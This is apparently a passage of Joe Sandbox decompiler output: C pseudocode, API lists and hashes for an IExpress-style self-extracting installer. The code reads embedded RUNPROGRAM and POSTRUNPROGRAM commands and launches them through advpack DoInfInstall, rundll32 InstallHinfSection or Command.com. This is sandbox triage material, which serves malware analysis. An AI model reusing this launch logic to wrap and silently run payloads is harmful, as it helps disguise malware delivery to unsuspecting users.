                                                                                                                                                                                                                                                											return E00026CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_t157 = _v404;
                                                                                                                                                                                                                                                										__eflags = _t149;
                                                                                                                                                                                                                                                										if(_t149 != 0) {
                                                                                                                                                                                                                                                											L37:
                                                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                                                											if(_t157 == 0) {
                                                                                                                                                                                                                                                												L57:
                                                                                                                                                                                                                                                												_t151 = _v408;
                                                                                                                                                                                                                                                												_t146 =  &_v352;
                                                                                                                                                                                                                                                												_t130 = _t151; // executed
                                                                                                                                                                                                                                                												_t79 = E00023FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                                												__eflags = _t79;
                                                                                                                                                                                                                                                												if(_t79 == 0) {
                                                                                                                                                                                                                                                													L61:
                                                                                                                                                                                                                                                													LocalFree(_t151);
                                                                                                                                                                                                                                                													goto L62;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												L58:
                                                                                                                                                                                                                                                												LocalFree(_t151);
                                                                                                                                                                                                                                                												_t127 = _t127 + 1;
                                                                                                                                                                                                                                                												_v396 = _t127;
                                                                                                                                                                                                                                                												__eflags = _t127 - 2;
                                                                                                                                                                                                                                                												if(_t127 >= 2) {
                                                                                                                                                                                                                                                													_t155 = 1;
                                                                                                                                                                                                                                                													__eflags = 1;
                                                                                                                                                                                                                                                													L69:
                                                                                                                                                                                                                                                													__eflags =  *0x28580;
                                                                                                                                                                                                                                                													if( *0x28580 != 0) {
                                                                                                                                                                                                                                                														E00022267();
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                													_t77 = _t155;
                                                                                                                                                                                                                                                													goto L63;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												_t153 = _v392;
                                                                                                                                                                                                                                                												_t149 = _v388;
                                                                                                                                                                                                                                                												continue;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											L38:
                                                                                                                                                                                                                                                											__eflags =  *0x28180;
                                                                                                                                                                                                                                                											if( *0x28180 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c7;
                                                                                                                                                                                                                                                												E000244B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                												LocalFree(_v424);
                                                                                                                                                                                                                                                												 *0x29124 = 0x8007042b;
                                                                                                                                                                                                                                                												goto L62;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags = _t157;
                                                                                                                                                                                                                                                											if(_t157 == 0) {
                                                                                                                                                                                                                                                												goto L57;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x29a34 & 0x00000004;
                                                                                                                                                                                                                                                											if(__eflags == 0) {
                                                                                                                                                                                                                                                												goto L57;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t129 = E00026495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                                											__eflags = _t129;
                                                                                                                                                                                                                                                											if(_t129 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c8;
                                                                                                                                                                                                                                                												E000244B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                                												L65:
                                                                                                                                                                                                                                                												LocalFree(_v408);
                                                                                                                                                                                                                                                												 *0x29124 = E00026285();
                                                                                                                                                                                                                                                												goto L62;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                                											_v404 = _t146;
                                                                                                                                                                                                                                                											__eflags = _t146;
                                                                                                                                                                                                                                                											if(_t146 == 0) {
                                                                                                                                                                                                                                                												_t146 = 0x4c9;
                                                                                                                                                                                                                                                												__eflags = 0;
                                                                                                                                                                                                                                                												E000244B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                                												FreeLibrary(_t129);
                                                                                                                                                                                                                                                												goto L65;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											__eflags =  *0x28a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x29a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x28a38 & 0x0000ffff;
											_v380 = 0x29154;
											_v376 = _t151;
											_v372 = 0x291e4;
											_v360 = _t97;
											if( *0x28a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x29a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x28d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x29a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x2a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x29124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x29a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x28a20;
										if( *0x28a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0002202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0002468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x28c42;
									if( *0x28c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x28a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0002468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0002468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00021781( &_v276, 0x104, _t130, 0x28c42);
						goto L27;
					}
				}
                                                                                                                                                                                                                                                				_t130 = "REBOOT";
                                                                                                                                                                                                                                                				_t125 = E0002468F(_t130, 0x29a2c, 4);
                                                                                                                                                                                                                                                				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}





























































                                                                                                                                                                                                                                                0x00023e0a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023e15
                                                                                                                                                                                                                                                0x00023e17
                                                                                                                                                                                                                                                0x00023e19
                                                                                                                                                                                                                                                0x00023f94
                                                                                                                                                                                                                                                0x00023fa4
                                                                                                                                                                                                                                                0x00023f7c
                                                                                                                                                                                                                                                0x00023f80
                                                                                                                                                                                                                                                0x00023f8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f8b
                                                                                                                                                                                                                                                0x00023e2c
                                                                                                                                                                                                                                                0x00023e30
                                                                                                                                                                                                                                                0x00023e34
                                                                                                                                                                                                                                                0x00023e36
                                                                                                                                                                                                                                                0x00023f69
                                                                                                                                                                                                                                                0x00023f6e
                                                                                                                                                                                                                                                0x00023f70
                                                                                                                                                                                                                                                0x00023f76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f76
                                                                                                                                                                                                                                                0x00023e3c
                                                                                                                                                                                                                                                0x00023e43
                                                                                                                                                                                                                                                0x00023e47
                                                                                                                                                                                                                                                0x00023e52
                                                                                                                                                                                                                                                0x00023e56
                                                                                                                                                                                                                                                0x00023e5c
                                                                                                                                                                                                                                                0x00023e61
                                                                                                                                                                                                                                                0x00023e68
                                                                                                                                                                                                                                                0x00023e70
                                                                                                                                                                                                                                                0x00023e74
                                                                                                                                                                                                                                                0x00023e7c
                                                                                                                                                                                                                                                0x00023e80
                                                                                                                                                                                                                                                0x00023e82
                                                                                                                                                                                                                                                0x00023e82
                                                                                                                                                                                                                                                0x00023e87
                                                                                                                                                                                                                                                0x00023e87
                                                                                                                                                                                                                                                0x00023e8b
                                                                                                                                                                                                                                                0x00023e91
                                                                                                                                                                                                                                                0x00023e94
                                                                                                                                                                                                                                                0x00023e96
                                                                                                                                                                                                                                                0x00023e96
                                                                                                                                                                                                                                                0x00023e9b
                                                                                                                                                                                                                                                0x00023e9b
                                                                                                                                                                                                                                                0x00023e9f
                                                                                                                                                                                                                                                0x00023ea2
                                                                                                                                                                                                                                                0x00023ea4
                                                                                                                                                                                                                                                0x00023ea4
                                                                                                                                                                                                                                                0x00023ea9
                                                                                                                                                                                                                                                0x00023ea9
                                                                                                                                                                                                                                                0x00023ead
                                                                                                                                                                                                                                                0x00023eb3
                                                                                                                                                                                                                                                0x00023eb6
                                                                                                                                                                                                                                                0x00023eb8
                                                                                                                                                                                                                                                0x00023eb8
                                                                                                                                                                                                                                                0x00023ebd
                                                                                                                                                                                                                                                0x00023ebd
                                                                                                                                                                                                                                                0x00023ec1
                                                                                                                                                                                                                                                0x00023ec3
                                                                                                                                                                                                                                                0x00023ec5
                                                                                                                                                                                                                                                0x00023ec5
                                                                                                                                                                                                                                                0x00023eca
                                                                                                                                                                                                                                                0x00023eca
                                                                                                                                                                                                                                                0x00023ece
                                                                                                                                                                                                                                                0x00023ed5
                                                                                                                                                                                                                                                0x00023ed9
                                                                                                                                                                                                                                                0x00023ee0
                                                                                                                                                                                                                                                0x00023ee6
                                                                                                                                                                                                                                                0x00023eea
                                                                                                                                                                                                                                                0x00023eec
                                                                                                                                                                                                                                                0x00023eee
                                                                                                                                                                                                                                                0x00023ef3
                                                                                                                                                                                                                                                0x00023ef3
                                                                                                                                                                                                                                                0x00023ef5
                                                                                                                                                                                                                                                0x00023efa
                                                                                                                                                                                                                                                0x00023efb
                                                                                                                                                                                                                                                0x00023efd
                                                                                                                                                                                                                                                0x00023f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023eff
                                                                                                                                                                                                                                                0x00023eff
                                                                                                                                                                                                                                                0x00023f05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023f05
                                                                                                                                                                                                                                                0x00023efd
                                                                                                                                                                                                                                                0x00023dc7
                                                                                                                                                                                                                                                0x00023dce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023dd0
                                                                                                                                                                                                                                                0x00023dd7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023dd9
                                                                                                                                                                                                                                                0x00023ddb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023ddd
                                                                                                                                                                                                                                                0x00023de1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023de1
                                                                                                                                                                                                                                                0x00023d59
                                                                                                                                                                                                                                                0x00023d65
                                                                                                                                                                                                                                                0x00023d6a
                                                                                                                                                                                                                                                0x00023d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023d6e
                                                                                                                                                                                                                                                0x00023d75
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00023C11
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00023CDC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00028C42), ref: 00023D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00023E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00028C42), ref: 00023EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00028C42), ref: 00023F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00028C42), ref: 00023F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00028C42), ref: 00023F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00028C42), ref: 00023F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00028C42), ref: 00023F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00028C42), ref: 00023FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-3996648855
                                                                                                                                                                                                                                                • Opcode ID: 08b15947b43eee84976102f59d48c10d5f445ce07f17ca0ac707ada5a871aa23
                                                                                                                                                                                                                                                • Instruction ID: 1405d319e819bb86df9b27079ec46aad18c1ebdef632f4f87e3cc0aba5ff57f8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08b15947b43eee84976102f59d48c10d5f445ce07f17ca0ac707ada5a871aa23
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80B1D370A083219BE7B0DF24F945BAB76E4EB85700F20492EFA85D61D1DB7CC945CB92
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00021AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v527;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				char _v1552;
                                                                                                                                                                                                                                                				CHAR* _v1556;
                                                                                                                                                                                                                                                				int* _v1560;
                                                                                                                                                                                                                                                				CHAR** _v1564;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x28004; // 0xf4950d3e
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00021680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00021A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00021781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E0002658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00021680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E000266C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E000266C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00021680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00021781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E000216B3( &_v1552, 0x400, " ");
										E000216B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00022AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0002171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
                                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                                								_t60 =  &_v268;
                                                                                                                                                                                                                                                								goto L35;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t140 = "[";
                                                                                                                                                                                                                                                								_v1556 = _t151;
                                                                                                                                                                                                                                                								_t90 = E00021A84( &_v1556, "[");
                                                                                                                                                                                                                                                								if(_t90 != 0) {
                                                                                                                                                                                                                                                									if( *_t90 != 0) {
                                                                                                                                                                                                                                                										_v1556 = _t90;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									_t140 = "]";
                                                                                                                                                                                                                                                									E00021A84( &_v1556, "]");
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                                								if(_t156 == 0) {
                                                                                                                                                                                                                                                									L43:
                                                                                                                                                                                                                                                									_t60 = 0;
                                                                                                                                                                                                                                                									_t140 = 0x4b5;
                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                									_push(0x10);
                                                                                                                                                                                                                                                									_push(0);
                                                                                                                                                                                                                                                									L35:
                                                                                                                                                                                                                                                									_push(_t60);
                                                                                                                                                                                                                                                									E000244B9(0, _t140);
                                                                                                                                                                                                                                                									_t62 = 0;
                                                                                                                                                                                                                                                									goto L54;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t155 = _v1556;
                                                                                                                                                                                                                                                									_t92 = _t155;
                                                                                                                                                                                                                                                									if( *_t155 == 0) {
                                                                                                                                                                                                                                                										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									 *0x29120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                                									 *_v1560 = 1;
                                                                                                                                                                                                                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x21140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                                										 *0x29a34 =  *0x29a34 & 0xfffffffb;
                                                                                                                                                                                                                                                										if( *0x29a40 != 0) {
                                                                                                                                                                                                                                                											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t108 = "setupx.dll";
                                                                                                                                                                                                                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										if( *_t155 == 0) {
                                                                                                                                                                                                                                                											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										_push( &_v268);
                                                                                                                                                                                                                                                										_push(_t155);
                                                                                                                                                                                                                                                										E0002171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										 *0x29a34 =  *0x29a34 | 0x00000004;
                                                                                                                                                                                                                                                										if( *_t155 == 0) {
                                                                                                                                                                                                                                                											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										E00021680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                                										_t140 = 0x200;
                                                                                                                                                                                                                                                										E00021680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                									L53:
                                                                                                                                                                                                                                                									_t62 = 1;
                                                                                                                                                                                                                                                									 *_v1564 = _t156;
                                                                                                                                                                                                                                                									L54:
                                                                                                                                                                                                                                                									_pop(_t152);
                                                                                                                                                                                                                                                									return E00026CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}














































                                                                                                                                                                                                                                                0x00021e05
                                                                                                                                                                                                                                                0x00021e09
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021e12
                                                                                                                                                                                                                                                0x00021e1b
                                                                                                                                                                                                                                                0x00021e73
                                                                                                                                                                                                                                                0x00021e21
                                                                                                                                                                                                                                                0x00021e21
                                                                                                                                                                                                                                                0x00021e28
                                                                                                                                                                                                                                                0x00021e37
                                                                                                                                                                                                                                                0x00021e3e
                                                                                                                                                                                                                                                0x00021e52
                                                                                                                                                                                                                                                0x00021e60
                                                                                                                                                                                                                                                0x00021e60
                                                                                                                                                                                                                                                0x00021e3e
                                                                                                                                                                                                                                                0x00021e79
                                                                                                                                                                                                                                                0x00021e7b
                                                                                                                                                                                                                                                0x00021e84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021d9b
                                                                                                                                                                                                                                                0x00021d9b
                                                                                                                                                                                                                                                0x00021da0
                                                                                                                                                                                                                                                0x00021da2
                                                                                                                                                                                                                                                0x00021da5
                                                                                                                                                                                                                                                0x00021da5
                                                                                                                                                                                                                                                0x00021da7
                                                                                                                                                                                                                                                0x00021da8
                                                                                                                                                                                                                                                0x00021dac
                                                                                                                                                                                                                                                0x00021dae
                                                                                                                                                                                                                                                0x00021db4
                                                                                                                                                                                                                                                0x00021db7
                                                                                                                                                                                                                                                0x00021db7
                                                                                                                                                                                                                                                0x00021db9
                                                                                                                                                                                                                                                0x00021dba
                                                                                                                                                                                                                                                0x00021dbe
                                                                                                                                                                                                                                                0x00021dc3
                                                                                                                                                                                                                                                0x00021dce
                                                                                                                                                                                                                                                0x00021dd2
                                                                                                                                                                                                                                                0x00021deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021dd2
                                                                                                                                                                                                                                                0x00021bf7
                                                                                                                                                                                                                                                0x00021bfe
                                                                                                                                                                                                                                                0x00021c07
                                                                                                                                                                                                                                                0x00021d55
                                                                                                                                                                                                                                                0x00021d5a
                                                                                                                                                                                                                                                0x00021d5b
                                                                                                                                                                                                                                                0x00021d5d
                                                                                                                                                                                                                                                0x00021d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021c1b
                                                                                                                                                                                                                                                0x00021c1b
                                                                                                                                                                                                                                                0x00021c20
                                                                                                                                                                                                                                                0x00021c2c
                                                                                                                                                                                                                                                0x00021c33
                                                                                                                                                                                                                                                0x00021c38
                                                                                                                                                                                                                                                0x00021c3a
                                                                                                                                                                                                                                                0x00021c3a
                                                                                                                                                                                                                                                0x00021c40
                                                                                                                                                                                                                                                0x00021c4b
                                                                                                                                                                                                                                                0x00021c4b
                                                                                                                                                                                                                                                0x00021c5d
                                                                                                                                                                                                                                                0x00021c61
                                                                                                                                                                                                                                                0x00021dd4
                                                                                                                                                                                                                                                0x00021dd4
                                                                                                                                                                                                                                                0x00021dd6
                                                                                                                                                                                                                                                0x00021ddb
                                                                                                                                                                                                                                                0x00021ddc
                                                                                                                                                                                                                                                0x00021dde
                                                                                                                                                                                                                                                0x00021d64
                                                                                                                                                                                                                                                0x00021d64
                                                                                                                                                                                                                                                0x00021d67
                                                                                                                                                                                                                                                0x00021d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00021c67
                                                                                                                                                                                                                                                0x00021c67
                                                                                                                                                                                                                                                0x00021c6d
                                                                                                                                                                                                                                                0x00021c72
                                                                                                                                                                                                                                                0x00021c74
                                                                                                                                                                                                                                                0x00021c74
                                                                                                                                                                                                                                                0x00021c8e
                                                                                                                                                                                                                                                0x00021c99
                                                                                                                                                                                                                                                0x00021cc0
                                                                                                                                                                                                                                                0x00021cf8
                                                                                                                                                                                                                                                0x00021d07
                                                                                                                                                                                                                                                0x00021d23
                                                                                                                                                                                                                                                0x00021d09
                                                                                                                                                                                                                                                0x00021d14
                                                                                                                                                                                                                                                0x00021d1b
                                                                                                                                                                                                                                                0x00021d1b
                                                                                                                                                                                                                                                0x00021d2b
                                                                                                                                                                                                                                                0x00021d2d
                                                                                                                                                                                                                                                0x00021d2d
                                                                                                                                                                                                                                                0x00021d38
                                                                                                                                                                                                                                                0x00021d39
                                                                                                                                                                                                                                                0x00021d46
                                                                                                                                                                                                                                                0x00021cc2
